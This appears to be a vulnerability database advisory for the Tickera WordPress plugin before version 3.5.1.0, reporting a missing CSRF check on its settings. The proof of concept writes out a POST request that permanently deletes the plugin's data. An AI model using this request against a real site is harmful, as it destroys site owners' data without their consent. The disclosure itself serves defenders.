WordPress Plugin Vulnerabilities
Tickera < 3.5.1.0 - Plugin Data Deletion via CSRF
Description
The plugin does not have CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack.
Proof of Concept
1. Navigate to Tickera Settings » Delete info 2. Delete info request intercept like that POST /wp-admin/edit.php?post_type=tc_events&page=tc_settings&tab=tickera_delete_info tc_delete_plugin_data%5Btickera%5D=yes&tc_delete_selected_data_permanently=Delete+selected+data+permanently
Affects Plugins
References
CVE
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
rezaduty
Submitter
rezaduty
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-12-23 (about 1 years ago)
Added
2022-12-23 (about 1 years ago)
Last Updated
2024-01-26 (about 3 months ago)